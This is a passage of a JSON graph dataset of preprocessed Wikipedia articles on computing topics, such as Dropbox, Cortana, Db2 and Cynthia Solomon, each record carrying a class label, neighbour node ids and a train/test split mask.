subdomain verifications specified teams september 2012 facebook dropbox integrated allow users facebook groups share files using dropbox 2013 samsung pre-loaded dropbox mobile application android devices dropbox provided extra space users owning samsung devices november 2014 dropbox announced partnership microsoft integrate dropbox microsoft office applications ios android office 365 applications web july 10 2018 dropbox announced partnership salesforce aiming improve brand engagement team productivity dropbox software enables users drop file designated folder file automatically uploaded dropbox cloud-based service made available user computers devices also dropbox software installed keeping file up-to-date systems file user dropbox folder changed dropbox uploads pieces file changed whenever possible file folder deleted users recover within 30 days dropbox plus users recovery time extended one year purchasing extended version history add-on dropbox accounts accessed emails replied year automatically deleted dropbox also offers lan sync feature instead receiving information data dropbox servers computers local network exchange files directly potentially significantly improving synchronization speeds originally dropbox servers computer apps written python july 2014 dropbox began migrating performance-critical backend infrastructure go september 2012 dropbox website code base rewritten javascript coffeescript dropbox originally used amazon s3 storage system store user files 2014 2016 gradually moved away amazon use hardware referred magic pocket due dropbox description place keep stuff ’ get lost always access june 2017 company announced major global network expansion aiming increase synchronization speeds cutting costs expansion starting 14 cities across 7 countries 3 continents adds hundreds gigabits internet connectivity transit providers regional global isps hundreds new peering partners exchange traffic directly rather isp dropbox uses ssl transfers synchronization stores data via advanced encryption standard aes -256 encryption functionality dropbox integrated third-party applications application programming interface api dropbox prevents sharing copyrighted data checking hash files shared public folders users blacklist copyrighted material applies files folders shared users publicly files kept individual dropbox folder shared march 2013 dropbox acquired mailbox popular email app mailbox ceo gentry underwood saying rather grow mailbox 've decided join forces dropbox build together deal developers mailbox joined dropbox kept mailbox running stand-alone app mailbox ceo stated still struggling keep demand want use dropbox ceo drew houston said felt could help mailbox reach much different audience much faster acquisition reported cost 100 million december 2015 dropbox announced shut-down mailbox blog post drew houston arash ferdowsi explained 'll ... using 've learned mailbox build new ways communicate collaborate dropbox april 2014 dropbox introduced carousel photo video gallery combines photos dropbox photos phone automatically backs new ones take carousel sorted photos event date december 2015 dropbox announced shut-down carousel blog post drew houston arash ferdowsi explained 'll taking key features carousel back place photos live dropbox app april 2015 dropbox launched dropbox notes collaborative note-taking service beta testing phase prompting speculation dropbox planning bring product compete google docs techcrunch noted dropbox notes appeared new version project composer previous iteration service roots acquisition hackpad april 2014 october 2015 dropbox announced upcoming launch dropbox paper collaborative document editor noted media result development dropbox notes service earlier 2015 dropbox paper entered open beta august 2016 allowing anyone join test product mobile apps android ios also released january 2017 dropbox paper officially launched aimed businesses dropbox paper described one part online document one part collaboration one part task management tool one part content hub rob baesman dropbox head product allows importing editing collaboration number file types google microsoft others users devised number uses mashups technology expand dropbox functionality include sending files dropbox via gmail using dropbox sync instant messaging chat logs bittorrent management password management remote application launching system monitoring free web hosting service dropbox received several awards including crunchie award 2010 best internet application macworld 2009 editor choice award software nominated 2010 webby award 2010 mac design awards ars technica 2011 business insider named dropbox world sixth valuable startup 2017 publication ranked dropbox eighth valuable us startup valuation 10 billion described one combinator successful investments date apple launched cloud storage service later 2011 icloud n't hold back dropbox growth dropbox mobile iphone app release 2010 among top 10 best apps selected alex ahlund former ceo two websites focused mobile apps company android app also selected one top five best apps list compiled 2010 jason hiner zdnet founders drew houston arash ferdowsi named among top 30 30 entrepreneurs inc. 2011 january 2012 dropbox named startup year techcrunch 2016 company ranked 2 forbes cloud 100 list dropbox subject criticism controversy related multiple incidents including june 2011 authentication problem let accounts accessed several hours without passwords july 2011 privacy policy update language suggesting dropbox ownership users data concerns dropbox employee access users information july 2012 email spam recurrence february 2013 leaked government documents june 2013 information dropbox considered inclusion national security agency prism surveillance program july 2014 comment nsa whistleblower edward snowden criticizing dropbox encryption leak 68 million account passwords internet august 2016 january 2017 accidental data restoration incident years-old supposedly deleted files reappeared users accounts dropbox headquarters located san francisco originally market street expansion china basin landing building july 2011 allowing significant space increase number employees grew company needed expansion february 2014 signed lease two buildings brannan street needing substantial amounts space company started shopping remaining available space companies sublease november 2015 dropbox expanded second u.s. office austin texas february 2014 state texas city austin provided 1.7 million performance-based incentives package dropbox exchange locating office austin december 2012 dropbox set office dublin ireland first office outside united states",
    "neighbors": [
      1539,
      9732,
      526,
      1551,
      5650,
      10265,
      1054,
      5662,
      546,
      5666,
      9766,
      39,
      7212,
      3121,
      5681,
      8754,
      2613,
      1083,
      10820,
      7238,
      4683,
      590,
      1102,
      1104,
      7248,
      5202,
      11347,
      3672,
      5217,
      4194,
      9314,
      5732,
      4710,
      11372,
      6259,
      2170,
      2694,
      10887,
      4236,
      6797,
      9358,
      10893,
      8336,
      10900,
      5791,
      6307,
      10405,
      2217,
      9906,
      7352,
      4289,
      3269,
      5830,
      6344,
      7887,
      7889,
      7891,
      1239,
      11482,
      2267,
      735,
      6367,
      1764,
      3815,
      2795,
      236,
      10991,
      253,
      8446,
      8451,
      4869,
      3336,
      272,
      10517,
      2328,
      4377,
      8986,
      3355,
      11038,
      3881,
      6444,
      7983,
      8495,
      10032,
      823,
      11581,
      5950,
      11070,
      8515,
      10054,
      4429,
      7512,
      3428,
      362,
      4970,
      5482,
      8044,
      8554,
      10090,
      5489,
      4470,
      11646,
      6018,
      3462,
      4490,
      6027,
      911,
      1935,
      8592,
      405,
      10646,
      1435,
      9121,
      6565,
      3495,
      10670,
      1968,
      10161,
      10168,
      10681,
      956,
      448,
      11201,
      10185,
      1996,
      9682,
      467,
      10200,
      6618,
      4574,
      9186,
      488,
      1001,
      6632,
      10219,
      7660,
      7663,
      8191
    ],
    "mask": "None"
  },
  {
    "node_id": 4624,
    "label": 2,
    "text": "Cortana:cortana cortana virtual assistant created microsoft windows 10 windows 10 mobile windows phone 8.1 invoke smart speaker microsoft band surface headphones xbox one ios android windows mixed reality amazon alexa cortana set reminders recognize natural voice without requirement keyboard input answer questions using information bing search engine cortana currently available english portuguese french german italian spanish chinese japanese language editions depending software platform region used cortana demonstrated first time microsoft build developer conference april 2–4 2014 san francisco launched key ingredient microsoft planned makeover future operating systems windows phone windows named cortana synthetic intelligence character microsoft halo video game franchise originating bungie folklore jen taylor character voice actress returning voice personal assistant us-specific version development cortana started 2009 microsoft speech products team general manager zig serafin chief scientist larry heck heck serafin established vision mission long-range plan microsoft digital-personal-assistant built team expertise create initial prototypes cortana key researchers early efforts included microsoft research researchers dilek hakkani-tür gokhan tur andreas stolcke malcolm slaney research software developer madhu chinthakunta user-experience designer lisa stifelman develop cortana digital assistant team interviewed human personal assistants interviews inspired number unique features cortana including assistant notebook feature originally cortana meant codename petition windows phone uservoice site proved popular made codename official january 2015 microsoft announced availability cortana windows 10 desktops mobile devices part merging windows phone operating system large may 26 2015 microsoft announced cortana would also available mobile platforms android release set july 2015 android apk file containing cortana leaked ahead release officially released along ios version december 2015 e3 2015 microsoft announced cortana would come xbox one part universally designed windows 10 update console number people access cortana 800 million 2019 number questions asked 18 billion since launch microsoft integrated cortana numerous products microsoft edge browser bundled windows 10 microsoft cortana assistant deeply integrated edge browser cortana find opening-hours restaurant sites show retail coupons websites show weather information address bar worldwide partners conference 2015 microsoft demonstrated cortana integration upcoming products gigjam conversely microsoft announced late april 2016 would block anything bing edge used complete cortana searches raising questions anticompetitive behavior company microsoft windows car concept includes cortana concept makes possible drivers make restaurant reservations see places go microsoft build 2016 microsoft announced plans integrate cortana skype microsoft instant messaging service bot allow users order food book trips transcribe video messages make calendar appointments cortana addition bots cortana underline certain words phrases skype conversations relate contacts corporations writer engadget criticised cortana integration skype responding specific keywords feeling chatting search engine due impersonal way bots replied certain words hello bing music bot brought adele song name microsoft also announced microsoft build 2016 cortana would able cloud-synchronise notifications windows 10 mobile windows 10 action center well notifications android devices december 2016 microsoft announced preview calendar.help service enabled people delegate scheduling meetings cortana users interact cortana including email conversations cortana would check people availability outlook calendar google calendar work others cc 'd email schedule meeting service relied automation human-based computation may 2017 microsoft collaboration harman kardon announced invoke voice-activated speaker featuring cortana premium speaker cylindrical design offers 360 degree sound ability make receive calls skype features currently available cortana cortana set reminders recognize natural voice without requirement keyboard input answer questions using information bing search engine e.g. current weather traffic conditions sports scores biographies searches using windows 10 made microsoft bing search engine links open microsoft edge except screen reader narrator used links open internet explorer windows phone 8.1 universal bing smartsearch features incorporated cortana replaces previous bing search app activated user presses search button device cortana includes music recognition service cortana simulate rolling dice flipping coin 'cortana concert watch monitors bing searches determine bands musicians user interested integrates microsoft band watch band windows phone devices connected via bluetooth make reminders phone notifications since lumia denim mobile phone series launched october 2014 active listening added cortana enabling invoked phrase hey cortana controlled usual devices united kingdom o2 received lumia denim update without feature later clarified bug microsoft since fixed cortana integrates services foursquare provide restaurant local attraction recommendations lifx control smart light bulbs cortana stores personal information interests location data reminders contacts notebook draw upon add data learn user specific patterns behaviors users view specify information collected allow control privacy said level control goes beyond comparable assistants users delete information notebook cortana built system reminders example associated specific contact remind user communication contact possibly specific time phone specific location originally reminders specific device cortana installed since windows 10 microsoft synchronizes reminders across devices versions cortana take form two nested animated circles animated indicate activities searching talking main color scheme includes black white background shades blue respective circles cortana windows mobile android capable capturing device notifications sending windows 10 device allows computer user view notifications phone windows 10 action center feature announced early 2016 released later year cortana do-not-disturb mode users specify quiet hours available windows phone 8.1 users users change settings cortana calls users names nicknames also library easter eggs pre-determined remarks asked prediction cortana correctly predicted winners first 14 matches football 2014 fifa world cup knockout stage including semi-finals incorrectly picked brazil netherlands third place play-off match streak topped paul octopus correctly predicted 7 germany 2010 fifa world cup matches well final cortana forecast results various sports nba nfl super bowl icc cricket world cup various european football leagues cortana solve mathematical equations convert units measurement determine exchange rates currencies including bitcoin cortana integrate third-party apps windows 10 directly service starting late 2016 cortana integrated microsoft wunderlist service allowing cortana add act reminders microsoft build 2017 conference microsoft announced cortana would get consumer third-party skills capability similar amazon alexa feb 16 2018 microsoft announced connected home skills added ecobee honeywell lyric honeywell total connect comfort lifx tp-link kasa geeni well support ifttt also added august 15 2018 cortana-alexa integration went public preview microsoft ignite 2018 conference microsoft announced technology adopters program enterprises could build skills could developed deployed azure tenants accessible organizational units security groups presently third-party skills available us us english cortana indexes stores user information disabled cause windows search search web well local computer turned turning cortana delete user data stored microsoft servers deleted user action microsoft criticized requests bing website file called threshold.appcache contains cortana information searches made start menu even cortana disabled windows 10. cortana disabled users aged 13 years uk version cortana speaks british accent uses british idioms chinese version known xiao na speaks mandarin chinese icon featuring face two eyes used regions united kingdom english localised version cortana voiced ginnie watson anglo-french actress singer/songwriter voice-over artist united states english localised version cortana voiced jen taylor voice actress voices cortana namesake virtual assistant halo video game series table identifies localized version cortana currently available except indicated applies windows mobile windows 10 versions assistant natural language processing capabilities cortana derived tellme networks bought microsoft 2007 coupled semantic search database called satori cortana updates delivered independently main windows phone os allowing microsoft provide new features faster pace cortana-related features updated manner features hey cortana require windows phone update service qualcomm snapdragon sensorcore technology",
    "neighbors": [
      11270,
      5643,
      537,
      540,
      3102,
      8735,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      6709,
      10812,
      1087,
      3648,
      2630,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      4704,
      3170,
      7780,
      622,
      9839,
      3698,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10388,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      7333,
      1703,
      6827,
      2221,
      5300,
      7351,
      9913,
      10428,
      2749,
      2244,
      5319,
      200,
      8391,
      9420,
      10452,
      2263,
      9434,
      2782,
      9442,
      4836,
      8421,
      4326,
      2279,
      1770,
      10986,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      11538,
      10517,
      3351,
      8473,
      8985,
      11546,
      8988,
      7456,
      5413,
      11559,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      8046,
      9593,
      2943,
      4995,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      488,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 4625,
    "label": 4,
    "text": "FBI_Criminal,_Cyber,_Response,_and_Services_Branch:fbi criminal cyber response services branch criminal cyber response services branch ccrsb service within federal bureau investigation fbi created 2002 part u.s. government post-9/11 response ccrsb responsible investigating financial crime white-collar crime violent crime organized crime public corruption violations individual civil rights drug-related crime addition branch also oversees computer-based crime related counterterrorism counterintelligence criminal threats united states ccrsb deploys fbi agents analysts computer scientists uses traditional investigative techniques sources wiretaps surveillance forensics ccrsb works conjunction federal state regional agencies 56 field offices national cyber investigative joint task force ncijtf ccrsb operates 24-hour cyber command center cywatch combine resources fbi ncijtf event significant cyber intrusion provide connectivity federal cyber centers government agencies fbi field offices legal attachés private sector also exchange information cyber threats private sector partnerships domestic security alliance council infragard national cyber forensics training alliance ncfta ccrsb maintains overseas legal attaché offices coordinate cyber investigations address jurisdictional hurdles differences law countries collaborating cyber crime centers interpol europol unit also maintains website called cyber shield alliance www.leo.gov provides access cyber training information public means report cyber incidents fbi fbi reports since 2002 seen 80 percent increase number computer intrusion investigations headed fbi executive assistant director ccrsb responsible fbi director deputy director current ccrsb executive assistant director amy hess ccrsb formed unification fbi various traditional crime fighting units speculated establishment national security branch traditional criminal investigations branch within fbi lead formation career paths fbi special agents meaning new agent completed special agent training fbi academy quantico virginia completed mandatory probationary period choose go national security branch go criminal part bureau focus crimes organized crime narcotics civil rights violations fraud violent crime advocates new program say re-organization help fight terrorism making less bureaucratic",
    "neighbors": [
      1888,
      3825,
      4435,
      10935,
      3544,
      3354
    ],
    "mask": "Train"
  },
  {
    "node_id": 4626,
    "label": 4,
    "text": "Federal_Service_for_Technical_and_Export_Control:federal service technical export control federal service technical export control fstec fstek military agency russian federation russian ministry defence licenses export weapons dual-use technology items also responsible russian military information security fstec maintains data security threats database russia national vulnerability database requires western technology companies submit source code trade secrets allowing products imported russia fstec also liaises fsb controls cryptography russia 2019 fstec granted astra linux special status regarding use processing russian classified information",
    "neighbors": [
      4039,
      2446,
      6043,
      5373,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 4627,
    "label": 9,
    "text": "Visual_DialogScript:visual dialogscript visual dialogscript vds interpreted programming language microsoft windows used create small fast programs vds large number dialog graphical elements available create professional looking programs vds programs access windows api therefore possible write applications perform advanced tasks programming languages visual basic c++ delphi unlike programming languages syntax vds simple command occupies one line plain english name clearly describes purpose variables typeless hold many kinds information example numbers text functions clearly distinguishable names start like spreadsheet dialogscript language simple syntax unlike ms-dos batch language designed ease use efficiency interpreted run-time engine 10 system variables 0 9 initially script file name 0 command line parameters 1 9 batch file also 26 user variables z contents variables including system ones changed script running also 4032 global variables variables begin letter alphanumerics plus underscores e.g my_variable_1 limit length user-defined variable names comments simple information message box simple warning message box create custom dialog box write windows registry display input prompt dialog box storing result variable visual dialogscript created julian moss jm-tech 1998 version 3.0 emmanuel daunizeau s.a.d.e sarl took ownership development vds modifying improving syntax recently vds marketed british company commercial research ltd. still property emmanuel daunizeau continues develop several versions vds released time several versions available download",
    "neighbors": [
      8262,
      6797,
      847,
      5395,
      5754
    ],
    "mask": "Test"
  },
  {
    "node_id": 4628,
    "label": 7,
    "text": "Distributed_R:distributed r distributed r open source high-performance platform r language splits tasks multiple processing nodes reduce execution time analyze large data sets distributed r enhances r adding distributed data structures parallelism primitives run functions distributed data task scheduler multiple data loaders mostly used implement distributed versions machine learning tasks distributed r written c++ r retains familiar look feel r. hewlett-packard hp provides enterprise support distributed r proprietary additions fast data loader vertica database distributed r begun 2011 indrajit roy shivaram venkataraman alvin auyoung robert s. schreiber research project hp labs open sourced 2014 gplv2 license available github february 2015 distributed r reached first stable version 1.0 along enterprise support hp distributed r platform implement execute distributed applications r. goal extend r distributed computing retaining simplicity look-and-feel r. distributed r consists following components hp vertica provides tight integration database open source distributed r platform hp vertica 7.1 includes features enable fast parallel loading vertica database distribute r. parallel vertica loader five times 5x faster using traditional odbc based connectors vertica database also supports deployment machine learning models database distributed r users call distributed algorithms create machine learning models deploy vertica database use model in-database scoring predictions architectural details vertica database distributed r integration described sigmod 2015 paper",
    "neighbors": [
      5384,
      5833,
      7983,
      11221,
      823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4629,
    "label": 7,
    "text": "Standardization_in_Lab_Automation:standardization lab automation sila consortium not-for-profit membership organization formed software suppliers system integrators pharma/biotech companies consortium standardization lab automation sila develops introduces new device data interface standards allowing rapid integration lab automation hardware data management systems highly skilled experts member companies contribute sila technical work groups membership open institutions corporations individuals active life science lab automation industry sila consortium provides professional training support certification services suppliers system integrators implementing sila compliant interfaces sila global initiative standardize software interfaces field life science research instrumentation laboratory automation instigated pharmaceutical industry need flexible laboratory automation initiative supported major device software suppliers worldwide understanding mechanisms life requires extensive often repetitive experimentation laboratory automation therefore become instrumental progress life sciences industry provides commercial laboratory devices perform increasingly sophisticated tasks however combining equipment different providers work concert often proves impossible exporting captured data proprietary software analysis frustrating impossible situation leads waste resources available equipment needs replaced compatibility reasons software drivers purchased developed data conversion time consuming technical obstacles impede development higher level autonomous experimentation systems sila enables researchers focus scientific questions reducing equipment connectivity effort minimum achieved using proven tested maintained documentation code advancements seen home consumer electronics marked like usb upnp triggered idea applying similar approach laboratory automation environment possible easily upload pictures digital camera computer time even thinkable replace lab device e.g shaker one brand shaker different brand analyzing situation led conclusion incompatibility result missing interface definitions idea standardized interface based common command set ccs concept born however sila 1.x limitations based xml/soap considered outdated getting started sila 1.x easy process led proposition spin-off group sila consortium develop new standard sila 2 learning sila 1.x taking many concepts sila 2 vision accessible possible major goal create community working development new features sila formed not-for-profit membership organisation sila requires members pay annual membership dues details membership classes related fees found sila not-for-profit membership corporation global footprint membership open institutions corporations individuals active life science lab automation industry sila consortium provides professional training support certification services suppliers system integrators implementing sila compliant interfaces sila foundation standards addresses control data interfaces devices process management lims enterprise systems sila developed released several standards sila considers every entity modern laboratory service focusing behaviour service oriented design structures lead feature definition language fdl concept feature service sila server offers serves common communication base subject matter experts sme experts end users sila built connect systems laboratory laboratory information management systems electronic lab notebooks chromatography software laboratory devices balances pipettors various analytical instruments based http/2 sila uses protocol buffers serialize payload data furthermore sila 2 uses wire format provided grpc sila 2 based microservice architecture basic structure highly comparable web server ≙sila server web client ≙sila client sila device interface standard covers iso/osi levels device control interface physical application layer interface standard based web service/soap communication devices commands generally executed asynchronous manner immediate response delayed event completion command processing error error recovery procedures also supported general behavior devices managed state machine state machine enables also complex behaviors like parallel processing commands command queuing supporting three different integration levels sila provides unique standardized interface lab automation devices process management systems also legacy devices integrated sila compliant systems sila compliance achieved providing native directly embedded sila device interfaces software sila drivers and/or interface converters sila device control data interface standard eases accelerates integration adaptation systems generic device class interfaces providing common command sets grouping devices functionality device classes created sila common command sets define commands device classes sila defines command names number parameters names well return data since commands parameters described wsdl documentation tag commands web service process management software pms automatically generate list available commands device sila defined 30 device classes command library 100 commands commands range mandatory commands needed make transitions state machine required commands specific device class optional commands every device device class might provide functionality addition guidelines implementation supplier-specific device commands parameters provided commands applicable almost every device class example commands setparameter getparameter executemethod widely used also prepareforoutput prepareforinput common enable transport mechanisms transfer labware items device device mandatory commands include operations like reset initialize abort pause addition also locking device exclusive use provided",
    "neighbors": [
      64
    ],
    "mask": "None"
  },
  {
    "node_id": 4630,
    "label": 1,
    "text": "Db2_(Formerly_Db2_for_LUW):db2 formerly db2 luw db2 database formerly known db2 linux unix windows database server product developed ibm also known db2 luw brevity part db2 family database products db2 luw common server product member db2 family designed run popular operating systems contrast db2 products specific single platform june 27 2019 ibm released db2 v11.5 artificial intelligence ai database version 11.5 ibm db2® extending legacy dependability adding ai functionality designed help optimize performance support data scientists ’ mission find deeper insights powered built ai db2 11.5 built ai enhancements support popular languages frameworks used ai developers db2 11.5 native language support python ruby go java php node.js sequelize supports popular frameworks visual studio code jupyter notebooks db2 11.5 powered ai since includes features machine learning-based ml optimizer augmented data explorer ade ml optimizer supplement existing cost-based optimizer ade uses natural language querying faceted search natural language generation capabilities make easy users easily explore data stored db2 db2 adds ai functionality top capabilities enterprises relied decades mission-critical transactional analytics workloads supported hardware acceleration in-memory technology db2 columnar data store functionality blu acceleration® feature uses advanced compression techniques deliver reliably faster response times without limitations in- memory-only systems db2 11.5 ’ ai enhancements designed help companies achieve deeper insights quickly support ai applications greater ease combined existing db2 performance-boosting technology new capabilities make db2 perfect solution help business climb ladder robust ai practice db2 part hybrid data management platform offering hybrid data management enables enterprises drive innovation seamlessly accessing sharing analyzing data higher level data management enables structured semistructured unstructured data easily accessed analyzed whether stored premises public cloud private cloud open source combination deployments first release advanced db2 luw db2 universal database version 5 available unix windows os/2 platforms new product stemmed two earlier products db2 common server version 2 db2 parallel edition db2 universal database version 5 continued ibm new direction using common code base support db2 different platforms incorporating shared nothing features db2 parallel edition support large data warehousing databases db2 luw initially called db2 universal database udb time ibm marketing started use term database products notably mainframe z-series db2 thus db2 linux unix windows moniker became necessary distinguish common server db2 luw product single-platform db2 products current db2 luw product runs multiple linux unix distributions red hat enterprise linux suse linux ibm aix hp-ux solaris windows systems earlier versions also ran os/2 multiple editions marketed different sizes organisation uses code base also marketed without db2 name ibm infosphere warehouse edition 2017 db2 udb name became db2 addition standard acid-compliant row-organized relational database functionality key features ibm offers three editions db2 community edition standard server edition advanced server edition ibm db2 community edition free download use redistribute edition ibm db2 data server xml database relational database management system features limited four cpu cores 16 gb ram database size 100 gb enterprise support fix packs db2 community edition limit number users june 27 2019 ibm released db2 v11.5 db2 update designed deliver enhancements help automate data management eliminate etl support artificial intelligence data workloads along update ibm unveiled streamlined offerings free version db2 community edition version db2 contains features include expiration caps version db2 four cpu cores 16 gb ram ibm db2 community edition replaces db2 express edition june 27 2019 ibm announced special free version db2 database called db2 community edition db2 community edition created 11.5 release ibm db2 db2 community edition replaced previously free version ibm db2 known db2 express-c. january 30 2006 ibm announced special free version db2 express edition called db2 express-c db2 express-c edition created 8.2 release ibm db2 db2 express-c created new db2 versions 9.1 codenamed viper 9.5 codename viper 2 9.7 codename cobra 10.01 codename galileo 10.5 codename kepler 11.1 ibm db2 purexml implementation xml database features introduced beta db2 9 community edition download available following platforms ibm® db2 11.5 edition aix® ibm® db2 11.5 edition windows® amd64 intel® em64t systems x64 ibm® db2 11.5 linux® amd64 intel® em64t systems x64 ibm® db2 11.5 linux® power little endian systems also docker image download available community edition ibm db2 community edition limited use 16 gb ram four cpu cores database engine limit number concurrent user connections prior version ibm db2 express-c limited use 16 gb ram increase 4 gb v10.5 two cpu cores db2 community edition feature set similar db2 standard advanced editions main difference community edition lower cpu memory limits supported unsupported following extra features enabled db2 community edition unsupported regular db2 fix packs applied ibm release fixes publish updated installation images remove old ones unix versions need reinstalled possible perform in-place updates windows versions running installation program newer version need access regular db2 fix packs released several times per year need buy db2 standard advanced editions installation images traditionally refreshed every major db2 release sync code second fix pack db2 community editions annual subscriptions instead free trial available indefinitely users want scale beyond four cores 16 gb ram need migrate workload upgraded environment instead users apply license key existing implementation access additional capacity",
    "neighbors": [
      5380,
      1037,
      5006,
      6797,
      11024,
      8340,
      5397,
      4630,
      10518,
      10137,
      2168,
      4255,
      9634,
      6311,
      2089,
      5677,
      10413,
      7983,
      9397,
      823,
      10040,
      5051,
      5691,
      10048,
      6850,
      5450,
      4817,
      2775,
      8792,
      2780,
      477,
      734,
      479,
      3045,
      5356,
      5612,
      6124,
      3951,
      9455,
      499,
      8052,
      6775,
      3960,
      1146,
      3323,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 4631,
    "label": 1,
    "text": "RISE-PAK:rise-pak relief information systems earthquakes pakistan abbreviated rise-pak information-sharing web portal created pakistani-american economist asim ijaz khwaja along experts world bank pomona college national database registration authority world online pakistan largest internet service provider hosted website lahore school management sciences created 2005 earthquake kashmir claimed 80,000 lives around 70,000 injured pakistan india afghanistan website displayed maps 4000 villages affected quake database demographic information disaster information assistance received access routes villages area also provided pre-earthquake information showing village-level demographic infrastructure data major road networks distance every village epicentre earthquake",
    "neighbors": [
      848
    ],
    "mask": "Test"
  },
  {
    "node_id": 4632,
    "label": 3,
    "text": "Sakhr_Software_Company:sakhr software company sakhr software company arabic language technology company based kuwait deals products middle east e-governance education wireless security sakhr founded 1982 mohammed alsharekh branching computer hardware company alamiah electronics producing arabic versions msx computers nearly three decades industry us 100 million investments leads field arabic language machine translation ocr speech recognition speech synthesis search localisation company currently 200 employees worldwide research engineering activities silicon valley egypt sales offices u.s. washington dc california kuwait uae dubai abu dhabi oman egypt saudi arabia 2009 sakhr acquired dial directions inc. u.s. silicon valley software company providing language applications mobile cloud-computing environments including wireless carriers telematics “ smartphones ” apple iphone enhance market position emerging mobile application cloud computing market sakhr software following international awards",
    "neighbors": [
      5857,
      10557
    ],
    "mask": "None"
  },
  {
    "node_id": 4633,
    "label": 9,
    "text": "Cynthia_Solomon:cynthia solomon cynthia solomon american computer scientist known work artificial intelligence ai popularizing computer science students pioneer fields artificial intelligence computer science educational computing working researcher massachusetts institute technology mit dr. solomon took upon understand program programming language lisp began learning language realized need programming language accessible understandable children throughout research studies education dr. solomon worked full-time computer teacher elementary secondary schools work mainly focused research human-computer interaction children designers working bolt beranek newman worked wally feurzeig seymour papert create first programming language children named logo language created teach concepts programming related lisp dr. solomon attained many accomplishments life vice president r logo computer systems inc. apple logo developed director atari cambridge research laboratory dr. solomon worked program committee constructing modern knowledge marvin minsky institute artificial intelligence 2016 published many writings based research field child education technology classroom dr. solomon conducted workshops elementary schools high schools colleges regarding academic research writing continues contribute field speaking conferences working one laptop per child foundation cynthia admitted struggling classes middle high school mentioned became motivated continue education passion computer science kind music teachers dr. solomon received bachelor arts b.a history radcliffe college early 1960s subsequently studied boston university received master science m.s computer science 1976 received doctor philosophy ph.d. education harvard university 1985 intermittently completing schooling solomon worked several years researcher marvin minsky seymour papert mit later bolt beranek newman receiving b.a radcliffe college dr. solomon taught milton academy milton massachusetts seven years also became technology integration coordinator monsignor haddad middle school needham massachusetts 1980s massachusetts institute technology hired dr. solomon lead atari cambridge research laboratory due success developing logo solomon maintained long relationship working mit media lab one laptop per child foundation dr. solomon still leading worker foundation directed creation educational materials continued teaching consulting scholarship working several esteemed research labs foundations together seymour papert wally feurzeig cynthia designed logo computer programming language 1967 language children experiment words solve math problems make-up stories create games logo widely known use turtle graphics commands movement drawing produced line graphics either screen small robot called turtle 1970s new development logo introduced allowing program viewed multiple colors language created teach concepts programming related lisp functional programming language later logo also enabled papert called body-syntonic reasoning students could understand predict reason turtle motion imagining would turtle substantial differences among many dialects logo situation confused regular appearance turtle graphics programs call logo dr. solomon began develop logo coming realization children needed programming language solomon directed creation educational materials one laptop per child foundation doctoral research harvard led publication critical book computer environments children reflection theories learning education book explores opportunities challenges presented regarding computers learning environments focused specifically elementary school mathematics solomon discusses role computers innovative learning theories solomon also co-author designing multimedia environments children allison druin along many research projects writings contributing knowledge children learning environments conjunction technology 2016 solomon national center women information technology ncwit pioneer award solomon received lifetime achievement award constructionism 2016 introduced seymour papert memorial lecture crossroads 2018 facilitated conversation new uses program education new demographic users",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4122,
      8226,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      75,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      2666,
      5751,
      7805,
      1159,
      9865,
      9877,
      5803,
      2225,
      7867,
      4799,
      7880,
      8908,
      205,
      5837,
      219,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      4846,
      5360,
      5361,
      9969,
      8435,
      9975,
      6906,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      1301,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      311,
      6969,
      3408,
      6994,
      1365,
      2392,
      10083,
      6502,
      11625,
      3446,
      10104,
      377,
      4992,
      7048,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      7616,
      5569,
      6594,
      4550,
      11218,
      10712,
      3034,
      3051,
      5611,
      7670,
      11255
    ],
    "mask": "None"
  },
  {
    "node_id": 4634,
    "label": 2,
    "text": "Memory_Technology_Device:memory technology device memory technology device mtd type device file linux interacting flash memory mtd subsystem created provide abstraction layer hardware-specific device drivers higher-level applications although character block device files already existed semantics n't map well way flash memory devices operate usb sticks mmcs sds compactflashes popular removable devices confused mtds although contain flash memory hidden behind block device interface using flash translation layer using mtd use mtd aware file system jffs2 yaffs recommended mtd subsystem exports block devices well allows use common filesystem like ext4 however using mtd way recommended since neither detection bad blocks kind wear leveling",
    "neighbors": [
      9762,
      6403,
      1801,
      7818,
      9004,
      823,
      6263
    ],
    "mask": "Test"
  },
  {
    "node_id": 4635,
    "label": 0,
    "text": "Phrasal_template:phrasal template phrasal template phrase-long collocation contains one several empty slots may filled words produce individual phrases often restrictions grammatic category words allowed fill particular slots example phrase common stocks rose number number e.g. common stocks rose 1.72 340.36 phrasal templates akin forms blanks filled data word game mad libs makes use phrasal templates notion used natural language processing systems language generators application-oriented report generators neologism snowclone introduced refer special case phrasal templates clone popular clichés example misquotation diana vreeland pink navy blue india may gaven rise template x new black turn evolved x new term phrasal template first appeared linguistic study prosody 1983 n't appear come common use late 1990s",
    "neighbors": [
      10560,
      7780,
      5350
    ],
    "mask": "None"
  },
  {
    "node_id": 4636,
    "label": 2,
